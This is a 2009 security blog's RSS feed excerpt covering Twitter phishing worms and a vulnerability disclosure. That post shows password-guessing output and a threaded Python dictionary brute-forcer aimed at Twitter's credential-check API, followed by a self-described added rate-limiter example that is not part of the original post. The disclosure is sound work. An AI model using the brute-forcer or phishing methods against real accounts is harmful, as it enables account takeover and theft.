			<wfw:commentRss>http://praetorianprefect.com/archives/2009/11/not-the-haus-of-gaga-too/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Sir, the floor wishes to hear no more about your colon.</title>
		<link>http://praetorianprefect.com/archives/2009/10/sir-the-floor-wishes-to-hear-no-more-about-your-colon/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/sir-the-floor-wishes-to-hear-no-more-about-your-colon/#comments</comments>
		<pubDate>Fri, 30 Oct 2009 23:22:16 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[twishing]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[worm]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1340</guid>
		<description><![CDATA[The <a href="http://praetorianprefect.com/archives/2009/10/a-twitter-worms-brilliant-variation/">Twitter worm/twishing attack of the other day</a> has caught some interesting casualties in its net, most notably <a href="http://www.marcorubio.com/">Marco Rubio</a>, a former Speaker of the Florida House of Representatives and a viable candidate for one of Florida's Senate seats in 2010, and <a href="http://www.zachwamp.com/">Zach Wamp</a>, a candidate for Governor of Tennessee and a 14-year U.S. congressional representative.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/senatefloor.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/senatefloor-150x150.jpg" alt="senatefloor" title="senatefloor" width="150" height="150" class="alignleft size-thumbnail wp-image-1358" /></a>The <a href="http://praetorianprefect.com/archives/2009/10/a-twitter-worms-brilliant-variation/">Twitter worm/twishing attack of the other day</a> has caught some interesting casualties in its net, most notably <a href="http://www.marcorubio.com/">Marco Rubio</a>, a former Speaker of the Florida House of Representatives and a viable candidate for one of Florida&#8217;s Senate seats in 2010, and <a href="http://www.zachwamp.com/">Zach Wamp</a>, a candidate for Governor of Tennessee and a 14-year U.S. congressional representative.</p>

<p>The <a href="http://www.twitter.com/marcorubio">@marcorubio</a> Twitter account announced <i>&#8220;lol it&#8217;s amazing. look and feel great with http://cleansefats.com.&#8221;</i> on Wednesday. The campaign spokesman Alex Burgos stated that the account password was quickly changed and that they are still investigating what happened. The Twitter worm from Wednesday is known to <a href="http://praetorianprefect.com/archives/2009/10/a-twitter-worms-brilliant-variation/">create a phishing-style web site</a> to capture Twitter credentials; however, there has been no admission from the campaign that anyone fell for this method. It is also not clear that the attack isn&#8217;t also seeded by breaking into someone&#8217;s Twitter account, a vector still fairly wide open as we detailed in <i><a href="http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/">Breaking Twitter</a></i>. Finally, there is the possibility that the &#8220;Hi, this you on here&#8221; attack and this attack are separate. Twitter is usually pretty light on details of their analysis (assuming there is an analysis) of these attacks after the fact.</p>

<p><div id="attachment_1341" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/rubio_tweet.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/rubio_tweet-300x169.jpg" alt="Senate Candidate Rubio discusses colon cleanser." title="rubio_tweet" width="300" height="169" class="size-medium wp-image-1341" /></a><p class="wp-caption-text">Senate Candidate Rubio discusses colon cleanser.</p></div>
<br />
To his credit, candidate Rubio handled the whole incident pretty well:
<br /><br /></p>

<pre><code>I got hacked selling something?Could be worse. They could have written Go Noles or Go Jets as if it was 
coming from me!
9:43 AM Oct 29th from Echofon 
</code></pre>

<p>Meanwhile Congressman Wamp&#8217;s account <a href="http://twitter.com/zachwamp">@zachwamp</a> sent out direct messages (DMs) to his followers reading: <i>&#8220;hi. this works. i feel better and look great. http://bdgdfij.info.&#8221;</i> This URL also leads to a site about colon cleansing.</p>

<p>Congressman Wamp warned his followers about the DM&#8217;s with the following tweet:</p>

<pre><code>Disregard any direct message you get from my acct, we got spammed. Go to http://zachwamp.com to 
see my real vision for a healthy Tennessee!
12:25 PM Oct 29th from web 
</code></pre>

<p>It is unclear at this time whether members of government are targeted because their Twitter followers are in specific need of colon cleansing products and therefore more susceptible to such advertising. Constipation may explain some of the angrier political discourse in the nation of the last six months or so.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2009/10/a-twitter-worms-brilliant-variation/">A twitter &#8220;worm&#8217;s&#8221; brilliant variation</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/operation-phish-phry/">Operation Phish Phry</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">ROFL this you on here? The latest Twitter Worm</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/sir-the-floor-wishes-to-hear-no-more-about-your-colon/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>A twitter &#8220;worm&#8217;s&#8221; brilliant variation</title>
		<link>http://praetorianprefect.com/archives/2009/10/a-twitter-worms-brilliant-variation/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/a-twitter-worms-brilliant-variation/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 21:55:03 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[money mule]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1285</guid>
		<description><![CDATA[A new twitter worm is being reported making the rounds this morning, which is actually an expertly crafted variant of the worm we reported <a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">back on September 24th</a>. The variant has changed the direct message from "ROFL, this you on here?" to "hi. this you on here?". The bad actor in China has also used a new URL, but with the same Twitter login landing page identifiable by its stray HTML brace ">" following the line under 'Sign in to Twitter'. This important difference in wording should allow for a spate of new captured twitter credentials.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/adam-lambert-feeling-good-video.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/adam-lambert-feeling-good-video-150x150.jpg" alt="adam-lambert-feeling-good-video" title="adam-lambert-feeling-good-video" width="150" height="150" class="alignleft size-thumbnail wp-image-1297" /></a>A new twitter worm is being reported making the rounds this morning, which is actually an expertly crafted variant of the worm we reported <a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">back on September 24th</a>. The variant has changed the direct message from &#8220;ROFL, this you on here?&#8221; to &#8220;hi. this you on here?&#8221;. The bad actor in China has also used a new URL, but with the same Twitter login landing page identifiable by its stray HTML brace &#8220;>&#8221; following the line under &#8216;Sign in to Twitter&#8217;. This important difference in wording should allow for a spate of new captured twitter credentials.</p>

<p>:)</p>

<p>In all seriousness, this attack does rely on a successful social engineering ploy, playing on the victim&#8217;s vanity or curiosity about themselves and originating the message from a trusted source. On Twitter you can only send a direct message to someone who is following you. Or put another way, only someone whose updates you have previously expressed an interest in and signed up for (followed) can send you one of these messages. This attack is the Twitter equivalent of e-mail phishing schemes that use an e-mail sent from someone else’s address book: essentially, you theoretically know the person already and are more likely to open an e-mail received from them and act upon any instructions contained therein. Combine the suggestion that this person you know or know of has found something about you on a blog with a login screen that is familiar, and you end up with a number of compromised Twitter accounts.</p>

<p>In an unusual variant though, the URL used is less like the actual Twitter URL than in the original attack. Upon putting in credentials, you are, as in the previous attack, presented with the ubiquitous fail whale.</p>

<div id="attachment_1286" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/twitter_phishing.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/twitter_phishing-300x155.jpg" alt="Phishing site found when you click on the tweeted URL." title="twitter_phishing" width="300" height="155" class="size-medium wp-image-1286" /></a><p class="wp-caption-text">Phishing site found when you click on the tweeted URL.</p></div>

<p>This gets even more bizarre in that the fail whale page redirects you to &#8220;whatsup&#8221; http://gfsdgdf5845jg.blogspot.com/, the blog of NetMeg99 from Ventura, CA, with a picture of an American Idol contestant. NetMeg99 is a handle of Dawn Lager, apparently a big fan of American Idol contestant Adam Lambert, also from Ventura, CA. Here is her Twitter feed as an example: <a href="http://twitter.com/NetMeg99">http://twitter.com/NetMeg99</a>. The feed looks legitimate, so we have no idea why the site is redirecting to this blog, which is not reported in the malware site listings we checked.</p>

<p>The URL of the phishing site, http://blogger.djhxkcs.com, is again hosted in Beijing, China according to GeoIP; the host is listed as Chinanet Yunnan Province Network, which is China Telecom’s (3rd biggest mobile telecom provider in China) internet service. This would link it circumstantially to the previous attack, and therefore to a number of other related attacks as detailed <a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">in our previous post</a>.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2009/10/sir-the-floor-wishes-to-hear-no-more-about-your-colon/">Sir, the floor wishes to hear no more about your colon.</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/operation-phish-phry/">Operation Phish Phry</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">ROFL this you on here? The latest Twitter Worm</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/a-twitter-worms-brilliant-variation/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Breaking Twitter (authentication)</title>
		<link>http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/</link>
		<comments>http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 17:26:54 +0000</pubDate>
		<dc:creator>Jeremy Rossi</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tweethon]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=530</guid>
		<description><![CDATA[Yesterday we spent some time speculating on how phishing attacks like the one afflicting Twitter on Wednesday of this week are seeded.  How are the original direct messages sent out that kick off the first stolen credentials, the next set of direct messages, and so on in the loop?  We were hoping, but [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday we spent some time speculating on how phishing attacks like the one afflicting Twitter on Wednesday of this week are seeded.  How are the original direct messages sent out that kick off the first stolen credentials, the next set of direct messages, and so on in the loop?  We were hoping, though not counting on it, that Twitter might address this on their blog.  Taking a page from Google or Microsoft, an up-front and transparent approach to security seems to be the direction of major players in the online space.  Twitter may consider embracing this approach, given its rampant rise in popularity and thus its existence at the edge of malicious customized attacks from bad actors, as it likely has a lot of data that would benefit the information assurance community.</p>

<p><a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">In our rampant speculating</a> (guessing), we noted that we thought brute force password attacks would move away from the main Twitter login page because of their implementation of CAPTCHA (showing an image that is easy for a human to translate and type in but difficult for a computer to identify), which occurs after several failed login attempts.  While some success has been reported both by researchers attempting to break CAPTCHA and by researchers <a href="http://securitylabs.websense.com/content/Blogs/2919.aspx">watching others break it</a>, the processing time of translating thousands of CAPTCHA challenges becomes problematic from a password cracking standpoint (as far as we know; if you have a counterexample please show us).  So where does one go to perform the type of brute force password attack that a <a href="http://www.wired.com/threatlevel/2009/01/professed-twitt/">teenage hacker used in January</a> to gain access to <a href="http://twitter.com/crystal">Crystal the Twitter admin&#8217;s</a> account, achieve &#8216;Happiness&#8217; and allow others to tweet on behalf of Barack Obama and Britney Spears?</p>

<div id="attachment_576" class="wp-caption alignnone" style="width: 510px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/obama-twitter-hacked.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/obama-twitter-hacked.jpg" alt="Back in January the @BarackObama account was broken into." title="obama-twitter-hacked" width="500" height="327" class="size-full wp-image-576" /></a><p class="wp-caption-text">Back in January the @BarackObama account was broken into.</p></div>

<p>We think the Twitter API (application program interface) is the next place to go.  While Twitter is moving towards OAuth authentication (a mechanism by which users can provide others access to their data without providing their authentication credentials), the old-style API calls with user name and password are still available.  Providing an API is one of the primary reasons for Twitter&#8217;s popularity, as many tools can provide both interfaces into the online services of Twitter, as well as act as aggregators for the data within Twitter&#8217;s data stores.  In fact, for most tweeple, the actual system confines of Twitter might as well be a big database, as they are doing their tweeting through <a href="http://tweetdeck.com/">TweetDeck</a> or <a href="http://www.atebits.com/tweetie-iphone/">Tweetie</a>, monitoring topics at <a href="http://twitterfall.com/">TwitterFall</a>, looking at their favorite famous twits at <a href="http://www.congressional140.com">Congressional140</a> or <a href="http://www.celebritytweet.com/">CelebrityTweet</a>, mapping the world&#8217;s tweets with <a href="http://beta.twittervision.com/">TwitterVision</a>, or evaluating themselves with <a href="http://www.cursebird.com/">CurseBird</a>.</p>

<p>That same API provides an alternate path for logging into Twitter, and provides all the functionality available through the web application (authentication, reading tweets, tweeting).  You can read more about the overall Twitter API here: <a href="http://apiwiki.twitter.com">http://apiwiki.twitter.com</a>.</p>

<p>But wait you say, are you trying to tell us that brute force password attacks will move to the API when I just read on the Twitter API wiki that the API severely limits the rate of calls you are allowed to make to it (200/hour/IP for authenticated requests without whitelisting)?  That should be a mitigating control.  Should be, but isn&#8217;t, because it is not enforced on all of the API calls.</p>

<h3>Rate Limit? We don&#8217;t need no stinking rate limit.</h3>

<p>From the Twitter API documentation on <a href="http://apiwiki.twitter.com/Twitter-REST-API-Method%3A-account%C2%A0verify_credentials">account/verify_credentials</a>, Twitter states:</p>

<p><em>Returns an HTTP 200 OK response code and a representation of the requesting user if authentication was successful; returns a 401 status code and an error message if not.  Use this method to test if supplied user credentials are valid. Because this method can be a vector for a brute force dictionary attack to determine a user&#8217;s password, it is limited to <em>15 requests per 60 minute period</em> (starting from your first request).</em></p>

<p>Well, let&#8217;s see.  Using a simple Python program that tried known incorrect passwords as fast as the API would respond (but well below DoS thresholds), we have this:</p>

<pre><code>[~]% time python twitterauthcheck.py
Login: _eeeeeeeek Password: 0 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 1 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 2 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 3 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 4 failed: HTTP Error 401: Unauthorized

[......SNIP......]

Login: _eeeeeeeek Password: 295 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 296 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 297 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 298 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 299 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: &lt;redacted&gt; accepted
/opt/local/bin/python2.6 testingauth.py  2.03s user 1.47s system 1% cpu 4:25.05 total
</code></pre>

<p>So looking at the details we have 300 passwords attempted in 2 minutes and 3 seconds.  We can also see on the 300th attempt the password was accepted (we put the correct password in at number 300) so we can conclude that the account is not getting locked out due to enforcement of rate limits. So next we ran the script six times concurrently (3,600 attempts).  Still not locked out.</p>

<p>We are also showing that we are able to blow through the overall 150 request limit per IP per hour that Twitter reports is the rate limit.  Running multiple attempts did start to hit some 503 Bad Gateway errors which we thought might be the end of the road, but no, it started responding again a second later.</p>

<p>Running the script is slow.  Twitter&#8217;s greatest defense here against a true brute force attack using a single thread is that it takes a while for their infrastructure to respond.  We can call that security through lack of capacity.  Since a good password cracker takes more than a few hundred entries to work (<a href="http://praetorianprefect.com/wp-content/uploads/2009/09/dic.txt">this L0phtCrack dictionary has 235,007 entries</a>), we&#8217;ll go multi-threaded.</p>

<p>In a final controlled example, we use a known account where one person sets a simple dictionary-word password and the other person runs the script without specifically knowing the password (just in case someone wants to write a Computer Fraud and Abuse Act essay in the comments: when someone logs into their own account it&#8217;s called authentication).  Again, low request threshold, and only accessing our own account.</p>

<p>We reached 25,086 attempts before we got bored watching it; at that pace a little over 7 hours would get through the whole 200,000+ word dictionary, and likely any account using a common dictionary-based password would be accessed.  We tried a few subsequent runs that mixed in a correct password just to ensure everything was working, and the program notified us of the successful login.</p>

<p>If Twitter wants to minimize the probability of success for this vulnerability it could:</p>

<ul>
<li>Enforce its stated rate limits.</li>
<li>Start requiring minimally complex passwords.</li>
<li>Complete the migration to OAuth.</li>
</ul>
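<p>The first item on that list is the one the measurements above show missing: the documented 15-requests-per-60-minutes policy on verify_credentials was not being applied. The following is an added example, not Twitter's code and not part of the original post. It implements that quoted policy as a fixed window that starts at the caller's first request, keys the limit on both the source IP and the target account (the dual key is our assumption, not something Twitter documented), and replays the single-IP run of 300 guesses shown above against it. The IP addresses and the placeholder password are constructed.</p>

```python
"""Fixed-window rate limiting for a credential-check endpoint.

Added example (not Twitter's code). Models the policy quoted from the
verify_credentials documentation: 15 requests per 60-minute window, the
window starting from the caller's first request. Keying on both client IP
and target account is an assumption made here, not Twitter's documented
behaviour.
"""
import time
from collections import defaultdict


class FixedWindowLimiter:
    """Allow at most `limit` requests per `window` seconds for each key.

    The window opens on the first request for a key and is replaced by a
    fresh one once it has expired; requests beyond `limit` inside an open
    window are refused.
    """

    def __init__(self, limit=15, window=3600, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock          # injectable so tests can be deterministic
        self._state = {}            # key -> (window_start, request_count)

    def allow(self, key, now=None):
        now = self.clock() if now is None else now
        start, count = self._state.get(key, (now, 0))
        if now - start >= self.window:      # window expired: open a new one
            start, count = now, 0
        if count >= self.limit:
            self._state[key] = (start, count)
            return False
        self._state[key] = (start, count + 1)
        return True

    def retry_after(self, key, now=None):
        """Seconds until the key's window resets; 0 if it is not limited."""
        now = self.clock() if now is None else now
        if key not in self._state:
            return 0
        start, count = self._state[key]
        if count < self.limit:
            return 0
        return max(0, self.window - (now - start))


class CredentialCheckGuard:
    """Wrap a credential verifier with per-IP and per-account limits."""

    def __init__(self, verify, limit=15, window=3600):
        self.verify = verify
        self.by_ip = FixedWindowLimiter(limit, window)
        self.by_account = FixedWindowLimiter(limit, window)

    def check(self, ip, username, password, now):
        # Both budgets are consumed before the password is examined, so a
        # wrong guess costs exactly as much as a right one.
        ip_ok = self.by_ip.allow(ip, now)
        acct_ok = self.by_account.allow(username, now)
        if not (ip_ok and acct_ok):
            return (429, "rate limited")
        if self.verify(username, password):
            return (200, "ok")
        return (401, "unauthorized")


def simulate_post_run(attempts=300, interval=0.41):
    """Replay the post's single-IP run (constructed data) against the guard.

    The account password is a constructed placeholder; the client tries
    `attempts - 1` wrong passwords and the correct one last, as in the post.
    Returns a histogram of status codes plus the result of a legitimate
    login from a different IP once the account's window has rolled over.
    """
    correct = "correct-password-placeholder"        # constructed
    guard = CredentialCheckGuard(
        lambda u, p: u == "_eeeeeeeek" and p == correct)
    outcomes = defaultdict(int)
    now = 0.0
    for i in range(attempts):
        pw = correct if i == attempts - 1 else str(i)
        status, _ = guard.check("203.0.113.7", "_eeeeeeeek", pw, now)
        outcomes[status] += 1
        now += interval
    # Legitimate owner, new IP, an hour after the account window opened.
    status, _ = guard.check("198.51.100.5", "_eeeeeeeek", correct, now + 3600)
    outcomes["after_window"] = status
    return dict(outcomes)


if __name__ == "__main__":
    print(simulate_post_run())   # 15 x 401, 285 x 429, owner succeeds later
```

<p>Under this limiter the run shown above gets fifteen 401s and then nothing but 429s, including the attempt that carried the correct password, which is the point: the limit has to be spent on every attempt, not just on failures. The caveat a practitioner would want: a per-account key means an attacker can keep the legitimate owner out for the length of the window, the same cost the post attributes to Twitter's hour-long lockout, so the per-account limit is usually set looser than the per-IP one or paired with a second factor for the owner rather than a flat refusal.</p>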

<p>As we like Twitter as much as the next, and because we are in favor of good faith disclosure, we have notified them of our concerns. <em>Update</em>: A Twitter representative has responded that the information provided has been sent on to the right internal team at Twitter.</p>

<p>Here&#8217;s the Code: <a href="http://praetorianprefect.com/wp-content/uploads/2009/09/threadedtwitter.py.txt" title="threadedtwitter.py">threadedtwitter.py</a>
<br />
Dictionary: <a href="http://praetorianprefect.com/wp-content/uploads/2009/09/dic.txt" title="dic.txt">dic.txt</a></p>

<p><em>Please note, the code is provided for demonstration purposes only, should not be run ever, and contains intentional errors so that attempts to run it will not work.</em></p>

<p>The command is as follows: twitterauthcheck.py username passwordlist.txt</p>

<pre><code>import threading,Queue
import socket
import tweethon
import urllib2
import socket
import sys

class Threader:
    # Class taken from: Sept 3 2004, Justin A: http://code.activestate.com/recipes/302746/
    def __init__(self, numthreads):
        self._numthreads=numthreads

    def get_data(self,):
        raise NotImplementedError, "You must implement get_data as a function that returns an iterable"
        return range(10000)
    def handle_data(self,data):
        raise NotImplementedError, "You must implement handle_data as a function that returns anything"
        time.sleep(random.randrange(1,5))
        return data*data
    def handle_result(self, data, result):
        raise NotImplementedError, "You must implement handle_result as a function that does anything"
        print data, result

    def _handle_data(self):
        while 1:
            x=self.Q.get()
            if x is None:
                break
            self.DQ.put((x,self.handle_data(x)))

    def _handle_result(self):
        while 1:
            x,xa=self.DQ.get()
            if x is None:
                break
            self.handle_result(x, xa)

    def run(self):
        if hasattr(self, "prerun"):
            self.prerun()
        self.Q=Queue.Queue()
        self.DQ=Queue.Queue()
        ts=[]
        for x in range(self._numthreads):
            t=threading.Thread(target=self._handle_data)
            t.start()
            ts.append(t)

        at=threading.Thread(target=self._handle_result)
        at.start()

        try :
            for x in self.get_data():
                self.Q.put(x)
        except NotImplementedError, e:
            print e
        for x in range(self._numthreads):
            self.Q.put(None)
        for t in ts:
            t.join()
        self.DQ.put((None,None))
        at.join()
        if hasattr(self, "postrun"):
            return self.postrun()
        return None


class twitterpasswordtester(Threader):

    def get_data(self):
        data = open(sys.argv[2]).read()
        data = data.split('\n')
        self._usename = sys.argv[1]
        self.counter = 0
        return data

    def handle_data(self,p):
        print "in testAuth"
        u = self._usename
        x = tweethon.Api(username=u, password=p)
        x.SetCache(None)
        try:
            x.VerifyCredentials()
            results = "login: {0} Password: {1} accepted\n".format(u, p)
        except urllib2.HTTPError, e:
            results = "login: {0} Password: {1} failed: {2}\n".format(u, p, e)
        finally:
            del x
            return results

    def handle_result(self, data, result):
        print result
        print self.counter 
        self.counter += 1
        self.res.append((data,result))
    def prerun(self):
        self.res=[]
    def postrun(self):
        return self.res


z = twitterpasswordtester(10)
for n,ns in  a.run():
    print n,ns
</code></pre>

<p>Tweethon Source: <a href="http://bitbucket.org/jrossi/tweethon/src/tip/README">http://bitbucket.org/jrossi/tweethon/src/tip/README</a></p>

<p><em>The Tweethon library, the only custom or uncommon library above, is intended to make the <a href="http://twitter.com/help/api">Twitter web services API</a> easier for python programmers to use.</em></p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent XSS on Twitter.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>ROFL this you on here? The latest Twitter Worm</title>
		<link>http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/</link>
		<comments>http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/#comments</comments>
		<pubDate>Thu, 24 Sep 2009 08:25:29 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[captcha]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[money mule]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=484</guid>
		<description><![CDATA[At 2pm on Wednesday 9/24, wide-scale reports started showing up on Twitter that a new Twitter worm sends you a direct message with the content “rofl this you on here? http://videos.twitter.secure-logins01.com”.  The link opens a Twitter-style login page (albeit Twitter’s previous version of this page; they have a new one) which, except for being an old version and having a stray angle bracket, is convincing.  Upon logging in the user’s credentials are stolen, and presumably direct messages are sent to each follower that user has.]]></description>
			<content:encoded><![CDATA[<p>At 2pm on Wednesday 9/24, wide-scale reports started showing up on Twitter that a new Twitter worm sends you a direct message with the content “rofl this you on here? http://videos.twitter.secure-logins01.com”.  The link opens a Twitter-style login page (albeit Twitter’s previous version of this page; they have a new one) which, except for being an old version and having a stray angle bracket, is convincing.  Upon logging in the user’s credentials are stolen, and presumably direct messages are sent to each follower that user has.</p>

<div id="attachment_488" class="wp-caption alignleft" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_spoofedhomepage1.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_spoofedhomepage1-150x150.gif" alt="The phishing site&#039;s Twitter login page." title="The spoofed Twitter homepage" width="150" height="150" class="size-thumbnail wp-image-488" /></a><p class="wp-caption-text">The phishing site's Twitter login page.</p></div>
<div id="attachment_490" class="wp-caption alignleft" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_newhomepage.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_newhomepage-150x150.gif" alt="The real Twitter homepage" title="Twitter&#039;s real homepage" width="150" height="150" class="size-thumbnail wp-image-490" /></a><p class="wp-caption-text">The real Twitter homepage</p></div>

<p>Because direct messages are private, it is not possible for anyone but Twitter itself to pinpoint both when the attack began and how it was originally seeded (whether through compromised user accounts, previously set up spam/bot accounts, or another method).  A number of accounts appear to have been affected; by 5pm TwitScoop (a service that monitors popular Twitter trends) started reporting trending words including “hacked”, “worm”, and “spreading”.  The attack is effective because it rests on two classic principles of social engineering: the message comes from someone you have previously followed (and implicitly trust on some level), and the message appeals to a combination of curiosity and vanity.</p>

<p>On Twitter you can only send a direct message to someone who is following you. Put another way, only someone whose updates you have previously expressed an interest in and signed up for (followed) can send you one of these messages.  This attack is the Twitter equivalent of e-mail phishing schemes that send mail from someone else’s address book: you theoretically already know the person and are therefore more likely to open an e-mail received from them.  Combine the suggestion that this person you know (or know of) has found a video of you online with a familiar-looking login screen, and you end up with a number of compromised Twitter accounts.</p>

<div id="attachment_494" class="wp-caption alignnone" style="width: 365px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/Tweetie.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/Tweetie.png" alt="The direct message containing the link to the spoofed Twitter login." title="The Direct Message" width="355" height="118" class="size-full wp-image-494" /></a><p class="wp-caption-text">The direct message containing the link to the spoofed Twitter login.</p></div>

<p>This is far from the first worm Twitter has faced (Koobface, StalkDaily, mikeyy), and it is not even the first direct message phishing attack <a href="http://blog.twitter.com/2009/01/gone-phishing.html">in this style</a>.
While labeled a worm on Twitter, it has not yet been confirmed that this is a self-replicating program (an important part of the definition of a computer worm); it just appears that way. To establish this, Twitter would have to release some analysis of its logging showing a correlation between a compromised Twitter account, a direct message to a group of parties, a subsequent compromise and direct message from within that second group, and so on down the chain.  For now we’ll assume this is the path the attack is taking, based on the evidence we have noticed thus far. Regardless, since everyone is referring to this as a Twitter worm, for the sake of clarity we’ll continue to call it a worm here and update if proven otherwise.</p>

<p>What happened if you did go ahead and put credentials in the login screen: Fail Whale.</p>

<div id="attachment_1289" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/twphish.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/twphish-300x222.jpg" alt="If you put some string in for the login or password, this is what you get." title="twphish" width="300" height="222" class="size-medium wp-image-1289" /></a><p class="wp-caption-text">If you put some string in for the login or password, this is the response.</p></div>
<br /><br />

<h4>No Newcomer</h4>

<p>The URL in question is hosted in Beijing, China according to GeoIP; the host is listed as Chinanet Yunnan Province Network, which is China Telecom&#8217;s (the 3rd biggest mobile telecom provider in China) internet service.  The e-mail address used in the registration, lixing688@gmail.com, links this up to similar phishing sites for Twitter and MySpace identified in the malwaredomainlist forums back in July. That time around the site URL was secure-login.twitter.verifiylogin.com/twitter/.  MySpace was cloned at rnyspece.com.</p>

<p>Another URL, Faecibook.com, with the same e-mail address for registrar is a phishing site that appears to prey on users in a way very similar to the Twitter attack, posting comments on Facebook such as this: <em>“seen this really bad blog about you? http://www.jdsense.com/search/redirect.php?f=http://blogs.faecibook.com/sessionid?nglnbskuf”</em>.</p>

<p>That e-mail was also used in a series of money transfer agent scams (money mules) with bogus charity phishing web sites (KPEREZHOME, Rodney Lawrence International, Edward White, et al.), all hosted on a <a href="http://www.infoworld.com/d/developer-world/worst-registrar-xin-net-crackdown-requested-194">problematic registrar</a>, the Xin Net Technology Corporation.</p>

<p>A photographer, Warren Henke, <a href="http://www.warrenhenke.com/blogs/rants/glen-hamilton-international-organization">wrote a blog post</a> describing receipt of a phishing e-mail associated with this scam from the Glen Hamilton International Organization.</p>

